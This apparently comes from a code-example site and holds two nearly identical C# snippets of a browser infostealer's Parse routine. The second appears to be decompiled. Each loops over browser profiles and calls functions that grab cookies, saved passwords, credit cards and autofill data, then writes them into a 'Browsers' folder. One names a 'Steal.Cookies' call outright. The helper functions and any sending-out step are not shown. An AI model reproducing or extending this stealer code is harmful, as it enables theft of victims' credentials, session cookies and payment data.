Example #1
0
        public static void Parse(string dir)
        {
            Directory.CreateDirectory($"{dir}\\Browsers");
            Mozila.Mozila_still();

            try
            {
                foreach (string rootPath in GetProfile())
                {
                    try
                    {
                        string fullName = new FileInfo(rootPath).Directory.FullName;
                        string text     = rootPath.Contains(RoamingAppData) ? GetRoadData(fullName) : GetLclName(fullName);
                        if (!string.IsNullOrEmpty(text))
                        {
                            text = text[0].ToString().ToUpper() + text.Remove(0, 1);
                            string name = GetName(fullName);
                            GetCookies.Cookie_Grab(fullName, text, name);
                            GetPasswords.Passwords_Grab(fullName, text, name);
                            GetPasswords.Write_Passwords();
                            Get_Credit_Cards.Get_CC(fullName, text, name);
                            Get_Credit_Cards.Write_CC(text, name);
                            Get_Browser_Autofill.Get_Autofill(fullName, text, name);
                            Get_Browser_Autofill.Write_Autofill(text, name);
                        }
                    }
                    catch { }
                }
            }
            catch { }
        }
Example #2
0
 // Token: 0x06000158 RID: 344 RVA: 0x00008750 File Offset: 0x00006950
 public static void Parse(string dir)
 {
     Directory.CreateDirectory(dir + "\\Browsers");
     Steal.Cookies();
     try
     {
         foreach (string text in Browser_Parse.GetProfile())
         {
             try
             {
                 string fullName = new FileInfo(text).Directory.FullName;
                 string text2    = text.Contains(Browser_Parse.RoamingAppData) ? Browser_Parse.GetRoadData(fullName) : Browser_Parse.GetLclName(fullName);
                 if (!string.IsNullOrEmpty(text2))
                 {
                     text2 = text2[0].ToString().ToUpper() + text2.Remove(0, 1);
                     string name = Browser_Parse.GetName(fullName);
                     GetCookies.Cookie_Grab(fullName, text2, name);
                     GetPasswords.Passwords_Grab(fullName, text2, name);
                     GetPasswords.Write_Passwords();
                     Get_Credit_Cards.Get_CC(fullName, text2, name);
                     Get_Credit_Cards.Write_CC(text2, name);
                     Get_Browser_Autofill.Get_Autofill(fullName, text2, name);
                     Get_Browser_Autofill.Write_Autofill(text2, name);
                 }
             }
             catch
             {
             }
         }
     }
     catch
     {
     }
 }